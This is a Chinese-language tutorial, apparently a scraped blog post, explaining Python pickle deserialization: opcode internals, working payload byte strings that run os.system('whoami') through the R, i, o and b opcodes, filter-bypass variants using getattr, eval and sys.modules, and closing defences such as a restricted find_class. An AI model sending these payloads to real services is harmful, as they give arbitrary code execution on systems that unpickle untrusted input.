Python Pickle反序列化漏洞分析与利用<\/h1>

1. Pickle反序列化基础<\/h2>

1.1 Pickle序列化\/反序列化基本使用<\/h3>
Pickle是Python中用于对象序列化的模块，可以将Python对象转换为字节流（序列化），也可以从字节流重建对象（反序列化）。<\/p>
import<\/span> pickle
<\/span><\/span>
<\/span><\/span>class<\/span> Animal<\/span>:
<\/span><\/span>    def<\/span> __init__(self, animal):
<\/span><\/span>        self.<\/span>animal =<\/span> animal
<\/span><\/span>
<\/span><\/span># 序列化<\/span>
<\/span><\/span>test =<\/span> pickle.<\/span>dumps(Animal("dog"<\/span>))
<\/span><\/span>print(test)  # b'\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00animalq\x03X\x03\x00\x00\x00dogq\x04sb.'<\/span>
<\/span><\/span>
<\/span><\/span># 反序列化<\/span>
<\/span><\/span>obj =<\/span> pickle.<\/span>loads(test)
<\/span><\/span>print(obj.<\/span>animal)  # 输出: dog<\/span>
<\/span><\/span><\/code><\/pre>1.2 反序列化过程分析<\/h3>
Pickle反序列化的核心是_Unpickler<\/code>类的load()<\/code>方法，它通过操作码(opcode)来执行不同的操作：<\/p>
def<\/span> _loads<\/span>(s, *<\/span>, fix_imports=<\/span>True<\/span>, encoding=<\/span>"ASCII"<\/span>, errors=<\/span>"strict"<\/span>):
<\/span><\/span>    if<\/span> isinstance(s, str):
<\/span><\/span>        raise<\/span> TypeError<\/span>("Can't load pickle from unicode string"<\/span>)
<\/span><\/span>    file =<\/span> io.<\/span>BytesIO(s)
<\/span><\/span>    return<\/span> _Unpickler(file, fix_imports=<\/span>fix_imports,
<\/span><\/span>                      encoding=<\/span>encoding, errors=<\/span>errors).<\/span>load()
<\/span><\/span><\/code><\/pre>反序列化过程主要步骤：<\/p>

读取操作码<\/li>
通过dispatch<\/code>字典查找对应的处理函数<\/li>
执行处理函数<\/li>
操作栈和备忘录(memo)来构建对象<\/li>
<\/ol>
2. Pickle反序列化漏洞原理<\/h2>
Pickle反序列化的危险性在于它本质上是一个小型虚拟机，可以执行任意Python代码。攻击者可以构造恶意的序列化数据，在反序列化时执行任意命令。<\/p>
2.1 关键操作码分析<\/h3>
2.1.1 c<\/code> (GLOBAL) 操作码<\/h4>
用于导入模块和类：<\/p>
def<\/span> load_global<\/span>(self):
<\/span><\/span>    module =<\/span> self.<\/span>readline()[:-<\/span>1<\/span>].<\/span>decode("ascii"<\/span>)
<\/span><\/span>    name =<\/span> self.<\/span>readline()[:-<\/span>1<\/span>].<\/span>decode("ascii"<\/span>)
<\/span><\/span>    klass =<\/span> self.<\/span>find_class(module, name)
<\/span><\/span>    self.<\/span>append(klass)
<\/span><\/span><\/code><\/pre>2.1.2 R<\/code> (REDUCE) 操作码<\/h4>
用于执行函数调用：<\/p>
def<\/span> load_reduce<\/span>(self):
<\/span><\/span>    stack =<\/span> self.<\/span>stack
<\/span><\/span>    args =<\/span> stack.<\/span>pop()
<\/span><\/span>    func =<\/span> stack[-<\/span>1<\/span>]
<\/span><\/span>    stack[-<\/span>1<\/span>] =<\/span> func(*<\/span>args)
<\/span><\/span><\/code><\/pre>2.1.3 i<\/code> (INST) 操作码<\/h4>
用于实例化对象并调用方法：<\/p>
def<\/span> load_inst<\/span>(self):
<\/span><\/span>    module =<\/span> self.<\/span>readline()[:-<\/span>1<\/span>].<\/span>decode("ascii"<\/span>)
<\/span><\/span>    name =<\/span> self.<\/span>readline()[:-<\/span>1<\/span>].<\/span>decode("ascii"<\/span>)
<\/span><\/span>    klass =<\/span> self.<\/span>find_class(module, name)
<\/span><\/span>    self.<\/span>_instantiate(klass, self.<\/span>pop_mark())
<\/span><\/span><\/code><\/pre>2.1.4 o<\/code> (OBJ) 操作码<\/h4>
用于构建对象：<\/p>
def<\/span> load_obj<\/span>(self):
<\/span><\/span>    args =<\/span> self.<\/span>pop_mark()
<\/span><\/span>    cls =<\/span> args.<\/span>pop(0<\/span>)
<\/span><\/span>    self.<\/span>_instantiate(cls, args)
<\/span><\/span><\/code><\/pre>2.1.5 b<\/code> (BUILD) 操作码<\/h4>
用于设置对象属性：<\/p>
def<\/span> load_build<\/span>(self):
<\/span><\/span>    stack =<\/span> self.<\/span>stack
<\/span><\/span>    state =<\/span> stack.<\/span>pop()
<\/span><\/span>    inst =<\/span> stack[-<\/span>1<\/span>]
<\/span><\/span>    setstate =<\/span> getattr(inst, "__setstate__"<\/span>, None<\/span>)
<\/span><\/span>    if<\/span> setstate is<\/span> not<\/span> None<\/span>:
<\/span><\/span>        setstate(state)
<\/span><\/span>        return<\/span>
<\/span><\/span>    inst.<\/span>__dict__.<\/span>update(state)
<\/span><\/span><\/code><\/pre>3. 漏洞利用技术<\/h2>
3.1 全局变量引入<\/h3>
通过c<\/code>操作码引入全局变量：<\/p>
import<\/span> pickle
<\/span><\/span>import<\/span> secret
<\/span><\/span>
<\/span><\/span>class<\/span> Animal<\/span>:
<\/span><\/span>    def<\/span> __init__(self):
<\/span><\/span>        self.<\/span>animal =<\/span> "dog"<\/span>
<\/span><\/span>    def<\/span> check<\/span>(self):
<\/span><\/span>        if<\/span> self.<\/span>animal ==<\/span> secret.<\/span>best:
<\/span><\/span>            print("good!"<\/span>)
<\/span><\/span>
<\/span><\/span>payload =<\/span> b<\/span>'<\/span>\x80\x03<\/span>c__main__<\/span>\n<\/span>Animal<\/span>\n<\/span>q<\/span>\x00<\/span>)<\/span>\x81<\/span>q<\/span>\x01<\/span>}q<\/span>\x02<\/span>X<\/span>\x06\x00\x00\x00<\/span>animalq<\/span>\x03<\/span>csecret<\/span>\n<\/span>best<\/span>\n<\/span>q<\/span>\x04<\/span>sb.'<\/span>
<\/span><\/span>pickle.<\/span>loads(payload)
<\/span><\/span><\/code><\/pre>3.2 全局变量修改<\/h3>
通过修改sys.modules<\/code>来改变模块行为：<\/p>
payload =<\/span> b<\/span>'<\/span>\x80\x03<\/span>c__main__<\/span>\n<\/span>secret<\/span>\n<\/span>q<\/span>\x00<\/span>q<\/span>\x01<\/span>}X<\/span>\x04\x00\x00\x00<\/span>bestX<\/span>\x03\x00\x00\x00<\/span>dogsb0c__main__<\/span>\n<\/span>Animal<\/span>\n<\/span>)<\/span>\x81<\/span>}X<\/span>\x06\x00\x00\x00<\/span>animalX<\/span>\x03\x00\x00\x00<\/span>dogsb.'<\/span>
<\/span><\/span><\/code><\/pre>3.3 函数执行技术<\/h3>
3.3.1 使用i<\/code>操作码执行命令<\/h4>
payload =<\/span> b<\/span>'(X<\/span>\x06\x00\x00\x00<\/span>whoamiios<\/span>\n<\/span>system<\/span>\n<\/span>.'<\/span>
<\/span><\/span><\/code><\/pre>3.3.2 使用R<\/code>操作码执行命令<\/h4>
payload =<\/span> b<\/span>'cos<\/span>\n<\/span>system<\/span>\n<\/span>X<\/span>\x06\x00\x00\x00<\/span>whoami<\/span>\x85<\/span>R.'<\/span>
<\/span><\/span><\/code><\/pre>3.3.3 使用o<\/code>操作码执行命令<\/h4>
payload =<\/span> b<\/span>'(cos<\/span>\n<\/span>system<\/span>\n<\/span>X<\/span>\x06\x00\x00\x00<\/span>whoamio.'<\/span>
<\/span><\/span><\/code><\/pre>3.3.4 使用b<\/code>操作码和__setstate__<\/code>执行命令<\/h4>
payload =<\/span> b<\/span>'<\/span>\x80\x03<\/span>c__main__<\/span>\n<\/span>Animal<\/span>\n<\/span>)<\/span>\x81<\/span>}X<\/span>\x0C\x00\x00\x00<\/span>__setstate__cos<\/span>\n<\/span>system<\/span>\n<\/span>sbX<\/span>\x06\x00\x00\x00<\/span>whoamib.'<\/span>
<\/span><\/span><\/code><\/pre>4. WAF绕过技术<\/h2>
4.1 黑名单绕过<\/h3>
使用builtins.getattr<\/code>绕过函数导入限制：<\/p>
# R操作码版本<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'<\/span>\x80\x03<\/span>cbuiltins<\/span>\n<\/span>getattr<\/span>\n<\/span>p0<\/span>\n<\/span>cbuiltins<\/span>\n<\/span>dict<\/span>\n<\/span>p1<\/span>\n<\/span>X<\/span>\x03\x00\x00\x00<\/span>get<\/span>\x86<\/span>Rp2<\/span>\n<\/span>0g2<\/span>\n<\/span>cbuiltins<\/span>\n<\/span>globals<\/span>\n<\/span>)RX<\/span>\x0C\x00\x00\x00<\/span>__builtins__<\/span>\x86<\/span>Rp3<\/span>\n<\/span>0g0<\/span>\n<\/span>g3<\/span>\n<\/span>X<\/span>\x04\x00\x00\x00<\/span>eval<\/span>\x86<\/span>Rp4<\/span>\n<\/span>0g4<\/span>\n<\/span>X<\/span>\x21\x00\x00\x00<\/span>__import__("os").system("whoami")<\/span>\x85<\/span>R.'<\/span>
<\/span><\/span>
<\/span><\/span># o操作码版本<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'<\/span>\x80\x03<\/span>(cbuiltins<\/span>\n<\/span>getattr<\/span>\n<\/span>p0<\/span>\n<\/span>cbuiltins<\/span>\n<\/span>dict<\/span>\n<\/span>p1<\/span>\n<\/span>X<\/span>\x03\x00\x00\x00<\/span>getop2<\/span>\n<\/span>0(g2<\/span>\n<\/span>(cbuiltins<\/span>\n<\/span>globals<\/span>\n<\/span>oX<\/span>\x0C\x00\x00\x00<\/span>__builtins__op3<\/span>\n<\/span>(g0<\/span>\n<\/span>g3<\/span>\n<\/span>X<\/span>\x04\x00\x00\x00<\/span>evalop4<\/span>\n<\/span>(g4<\/span>\n<\/span>X<\/span>\x21\x00\x00\x00<\/span>__import__("os").system("whoami")o.'<\/span>
<\/span><\/span><\/code><\/pre>4.2 绕过域名空间限制<\/h3>
通过修改sys.modules<\/code>来绕过限制：<\/p>
# R操作码版本<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'csys<\/span>\n<\/span>modules<\/span>\n<\/span>p0<\/span>\n<\/span>X<\/span>\x03\x00\x00\x00<\/span>sysg0<\/span>\n<\/span>scsys<\/span>\n<\/span>get<\/span>\n<\/span>p1<\/span>\n<\/span>g1<\/span>\n<\/span>X<\/span>\x02\x00\x00\x00<\/span>os<\/span>\x85<\/span>Rp2<\/span>\n<\/span>g0<\/span>\n<\/span>X<\/span>\x03\x00\x00\x00<\/span>sysg2<\/span>\n<\/span>scsys<\/span>\n<\/span>system<\/span>\n<\/span>X<\/span>\x06\x00\x00\x00<\/span>whoami<\/span>\x85<\/span>R.'<\/span>
<\/span><\/span>
<\/span><\/span># o操作码版本<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'csys<\/span>\n<\/span>modules<\/span>\n<\/span>p0<\/span>\n<\/span>X<\/span>\x03\x00\x00\x00<\/span>sysg0<\/span>\n<\/span>s(csys<\/span>\n<\/span>get<\/span>\n<\/span>p1<\/span>\n<\/span>X<\/span>\x02\x00\x00\x00<\/span>osop2<\/span>\n<\/span>g0<\/span>\n<\/span>X<\/span>\x03\x00\x00\x00<\/span>sysg2<\/span>\n<\/span>s(csys<\/span>\n<\/span>system<\/span>\n<\/span>X<\/span>\x06\x00\x00\x00<\/span>whoamio.'<\/span>
<\/span><\/span><\/code><\/pre>5. 防御措施<\/h2>


避免反序列化不可信数据<\/strong>：这是最根本的解决方案<\/p>
<\/li>

使用更安全的序列化格式<\/strong>：如JSON<\/p>
<\/li>

重写find_class方法<\/strong>：限制可反序列化的类<\/p>
<\/li>
<\/ol>
import<\/span> pickle
<\/span><\/span>
<\/span><\/span>class<\/span> RestrictedUnpickler<\/span>(pickle.<\/span>Unpickler):
<\/span><\/span>    def<\/span> find_class<\/span>(self, module, name):
<\/span><\/span>        # 只允许从特定模块加载安全类<\/span>
<\/span><\/span>        if<\/span> module ==<\/span> '__main__'<\/span>:
<\/span><\/span>            return<\/span> super().<\/span>find_class(module, name)
<\/span><\/span>        raise<\/span> pickle.<\/span>UnpicklingError(f<\/span>"global '<\/span>{<\/span>module}<\/span>.<\/span>{<\/span>name}<\/span>' is forbidden"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> restricted_loads<\/span>(s):
<\/span><\/span>    return<\/span> RestrictedUnpickler(io.<\/span>BytesIO(s)).<\/span>load()
<\/span><\/span><\/code><\/pre>
使用签名验证<\/strong>：对序列化数据进行签名，确保数据未被篡改<\/li>
<\/ol>
6. 总结<\/h2>
Pickle反序列化漏洞是Python中一个严重的安全问题，攻击者可以通过精心构造的序列化数据执行任意代码。理解Pickle的工作机制和各种操作码的作用是防御此类攻击的关键。在实际开发中，应尽量避免反序列化不可信数据，或实施严格的访问控制和安全检查。<\/p>
Python Pickle反序列化漏洞分析与利用<\/h1>

1. Pickle反序列化基础<\/h2>

2. Pickle反序列化漏洞原理<\/h2> Pickle反序列化的危险性在于它本质上是一个小型虚拟机，可以执行任意Python代码。攻击者可以构造恶意的序列化数据，在反序列化时执行任意命令。<\/p>

2.1 关键操作码分析<\/h3>

3. 漏洞利用技术<\/h2>

3.3 函数执行技术<\/h3>

4. WAF绕过技术<\/h2>

2. Pickle反序列化漏洞原理<\/h2>
Pickle反序列化的危险性在于它本质上是一个小型虚拟机，可以执行任意Python代码。攻击者可以构造恶意的序列化数据，在反序列化时执行任意命令。<\/p>
